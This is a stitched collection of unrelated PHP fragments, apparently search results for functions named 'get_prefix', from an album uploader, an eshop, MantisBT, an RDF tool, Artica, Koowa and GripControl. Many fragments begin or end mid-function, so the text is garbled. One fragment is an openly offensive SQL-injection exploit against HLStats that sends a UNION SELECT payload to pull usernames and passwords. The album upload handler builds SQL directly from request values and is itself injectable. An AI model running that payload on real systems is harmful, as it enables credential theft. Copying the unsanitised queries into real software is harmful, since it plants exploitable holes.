require dirname(__FILE__) . '/includes/init.php'; if ($_REQUEST['act'] == 'list') { $album_types = get_album_types(); $smarty->assign("album_types", $album_types); $smarty->display('album_list.htm'); exit; } elseif ($_REQUEST['act'] == 'ajax_list') { $list = album_list(); make_json($list); } elseif ($_REQUEST['act'] == 'upload') { //获取文件上传的目录 $targetPath = '../resource/data/album/' . $_REQUEST['atype_id']; $verifyToken = md5('unique_salt' . $_REQUEST['timestamp']); if (!empty($_FILES) && $_REQUEST['token'] == $verifyToken) { $tempFile = $_FILES['Filedata']['tmp_name']; $image_name = unique_name($targetPath . '/') . '.' . get_prefix($_FILES['Filedata']['name']); $targetFile = rtrim($targetPath, '/') . '/' . $image_name; move_uploaded_file($tempFile, $targetFile); $sql = "insert into " . $ecs->table("album") . " (class_code, type, name, path, filesize, creator, created) \r\n\t\tvalues ('" . $_SESSION['class_code'] . "','" . $_REQUEST['atype_id'] . "', '" . $_REQUEST['Filename'] . "',\r\n\t\t\t'" . $targetFile . "','" . $_FILES['Filedata']['size'] . "','" . $_SESSION['admin_id'] . "',now()) "; $db->query($sql); admin_log(addslashes($_REQUEST['Filename']), 'upload', "album_picture"); make_json_result("上传“" . $_REQUEST['Filename'] . "”成功!"); } make_json_error("上传" . $_REQUEST['Filename'] . "失败!"); } elseif ($_REQUEST['act'] == 'ajax_save') { $id = !empty($_REQUEST['album_id']) ? intval($_REQUEST['album_id']) : 0; $sql = "update " . $ecs->table("album") . " set name='" . $_REQUEST["name"] . "',\r\n\t\t\tsort='" . $_REQUEST["sort"] . "'\r\n\t\t\twhere album_id=" . $id; $db->query($sql); admin_log(addslashes($_REQUEST["name"] . $id), 'update', $sql); make_json_result("修改成功!"); } elseif ($_REQUEST['act'] == 'ajax_delete') {
function get_prefix($CategoryID) { global $tpl, $template, $config, $mysql, $lang, $twig, $prefixed; $ParentID = $mysql->result('SELECT parent_id FROM ' . prefix . '_eshop_categories WHERE id = ' . $CategoryID . ' '); $prefixed[$CategoryID]['f'] .= ' '; if ($ParentID == 0) { $add_prefix .= ''; } else { $prefixed[$CategoryID]['s'] .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> '; $add_prefix .= '<img src="/engine/plugins/eshop/tpl/img/tree.gif"> '; foreach ($mysql->select("SELECT * FROM " . prefix . "_eshop_categories WHERE id=" . $ParentID . " ") as $row2) { $CategoryID2 = $row2['id']; $ParentID2 = $row2['parent_id']; } get_prefix($CategoryID2); } #var_dump($prefixed[$CategoryID]); return $add_prefix; }
function upgrade_move_att2disk( $p_source ) { # $p_source is the string "attachment" or "project" if( $p_source == 'attachment' ) { $t_file_table = db_get_table( 'bug_file' ); $t_bug_label = "Bug"; } if( $p_source == 'project' ) { $t_file_table = db_get_table( 'project_file' ); $t_bug_label = "Project"; } # check that the source was valid if( !isset( $t_file_table ) ) { echo 'Failure: Internal Error: File source not set'; return; } # check that the destination is set up properly $t_upload_method = config_get_global( 'file_upload_method' ); if( $t_upload_method <> DISK ) { echo 'Failure: Upload Method is not DISK'; return; } $query = 'SELECT * FROM ' . $t_file_table . ' WHERE content <> \'\''; $result = @db_query_bound( $query ); if( false == $result ) { echo '<p>No attachments need to be moved.</p>'; return; } $count = db_num_rows( $result ); echo '<p>Found ' . $count . ' attachments to be moved.</p>'; $t_failures = 0; if( $count > 0 ) { echo '<table width="80%" bgcolor="#222222" cellpadding="10" cellspacing="1">'; # Headings echo '<tr bgcolor="#ffffff"><th width="10%">' . $t_bug_label . '</th><th width="20%">Attachment</th><th width="70%">Status</th></tr>'; } for( $i = 0;$i < $count;$i++ ) { $t_row = db_fetch_array( $result ); // trace bug id back to project to determine the proper file path if( $p_source == 'attachment' ) { $t_project_id = bug_get_field( $t_row['bug_id'], 'project_id' ); $t_bug_id = $t_row['bug_id']; } else { $t_project_id = (int) $t_row['project_id']; $t_bug_id = $t_project_id; } $t_file_path = project_get_field( $t_project_id, 'file_path' ); $prefix = get_prefix( $t_file_path ); $t_real_file_path = $prefix . $t_file_path; $c_filename = file_clean_name( $t_row['filename'] ); printf( "\n<tr %s><td>%8d</td><td>%s</td><td>", helper_alternate_class(), $t_bug_id, $t_row['filename'] ); if( is_blank( $t_real_file_path ) || !file_exists( $t_real_file_path ) || !is_dir( $t_real_file_path ) || !is_writable( $t_real_file_path ) ) { echo 'Destination ' . $t_real_file_path . ' not writable'; $t_failures++; } else { $t_file_name = $t_real_file_path . $c_filename; // write file to disk store after adjusting the path if( file_put_contents( $t_file_name, $t_row['content'] ) ) { // successful, update database /** @todo do we want to check the size of data transfer matches here? */ $c_new_file_name = $t_file_path . $c_filename; $query2 = "UPDATE $t_file_table SET diskfile = " . db_param() . ", folder = " . db_param() . ", content = '' WHERE id = " . db_param(); $update = @db_query_bound( $query2, Array( $c_new_file_name, $t_file_path, $t_row['id'] ) ); if( !$update ) { echo 'database update failed'; $t_failures++; } else { echo 'moved to ' . $t_file_name; } } else { echo 'copy to ' . $t_file_name . ' failed'; $t_failures++; } } echo '</td></tr>'; } echo '</table><br />' . $count . ' attachments processed, ' . $t_failures . ' failures'; }
function triples_to_rdfquery($triples) { global $prefix; $rdfquery = ''; //print_r($triples); $uri = key($triples['result']); $count = 0; foreach ($triples['result'] as $k => $v) { foreach ($v as $key => $value) { $subject = ''; if ($count > 0) { $subject .= ",\n"; } $count++; $subject .= "\$.rdf.triple('<{$uri}> "; $subject .= get_qname($key); $namespaces = "namespaces: { " . get_short_prefix($key) . ": '" . get_prefix($key) . "' }"; /* echo '<pre>'; print_r($value); echo '</pre>'; */ foreach ($value as $v) { $object = ''; if ($v['type'] == 'literal') { $object .= ' "' . str_replace("'", "\\'", $v['value']) . '"'; } else { $object .= ' <' . $v['value'] . ">"; } $rdfquery .= $subject . $object; $rdfquery .= " .',{\n{$namespaces}\n})"; } } } $rdfquery .= "\n"; return $rdfquery; }
$GLOBALS["VERBOSE"] = true; } if ($argv[1] == "--id") { parse_db($argv[2]); die; } if ($argv[1] == "--import-id") { import_users($argv[2]); die; } if ($argv[1] == "--make-unique") { make_database_unique($argv[2]); die; } if ($argv[1] == "--get-prefix") { get_prefix($argv[2]); die; } $unix = new unix(); $pidfile = "/etc/artica-postfix/" . basename(__FILE__) . ".pid"; $pid = trim(@file_get_contents($pidfile)); if ($unix->process_exists($pid)) { $pid = getmypid(); echo "[{$pid}]:: Process {$pid} already running...\n"; die; } function get_prefix($path) { if (!is_file("{$path}.pre")) { $handle = @fopen("{$path}", "r"); $d = 0;
} return $prefix; } if (isset($_REQUEST['target']) && $_REQUEST['target'] != '') { //this exploit can take its sweet time. set_time_limit(0); $http = new http(); $addr = explode('?', $_REQUEST['target']); $addr = $addr[0]; if (isset($_REQUEST['proxy'])) { $http->proxy($_REQUEST['proxy']); } switch ($_REQUEST['button']) { case 'HLStats_Logins': $table = false; $prefix = get_prefix($addr); //print_r($prefix); foreach ($prefix as $pre) { if (!$table) { print "trying table prefix:{$pre}<br>"; //no comments are used in this payload, instead a second union select is used to finnish the query. $pay = "killLimit=1000%20union%20select%20username,password,acclevel,1,playerId%20from%20" . $pre . "Users%20UNION%20SELECT%201,1,1,1,1%20FROM%20" . $pre . "Players%20WHERE%201=0"; $resp = $http->post($addr . "?mode=playerinfo&player=1", '', $pay); $table = hl_get_sql($resp); // } } if (!$table && @(!in_array('hlstats_', $prefix))) { //ooah no the exploit has failed so far. $pre = "hlstats_"; //try the default prefix
/** * Finds the default class for an identifier or return null. * * @param KServiceIdentifier $identifier The identifier of the class * * @return string|bool Return the class name or false if not found */ public static function findDefaultClass($identifier) { $strIdentifier = (string) $identifier; if (isset(self::$_defaults[$strIdentifier])) { $classname = self::$_defaults[$strIdentifier]; if ($classname === false || class_exists($classname)) { return $classname; } } $classbase = 'Lib' . ucfirst($identifier->package) . KInflector::implode($identifier->path); $loader = KService::get('koowa:loader'); $classname = $classbase . ucfirst($identifier->name); if (!class_exists($classname)) { $classname = $classbase . 'Default'; if (!class_exists($classname)) { $classname = false; } } if ($classname === false) { if (isset(self::$_identifiers[$strIdentifier])) { $config = self::$_identifiers[$strIdentifier]; if (isset($config['default'])) { $classes = array_unique($config['default']); } else { $classes = get_prefix($config['prefix'], $config['name']); if (isset($config['fallback'])) { $classes[] = $config['fallback']; } } foreach ($classes as $class) { //make sure to find path first //then try to load it if ($loader->findPath($class, $identifier->basepath) && $loader->loadClass($class, $identifier->basepath)) { $classname = $class; break; } } } } self::setDefaultClass($strIdentifier, $classname); return $classname; }
public function detach($channel) { $args = array(); $args['channel'] = get_prefix() . $channel; $this->send_control(\GripControl\GripControl::websocket_control_message('detach')); }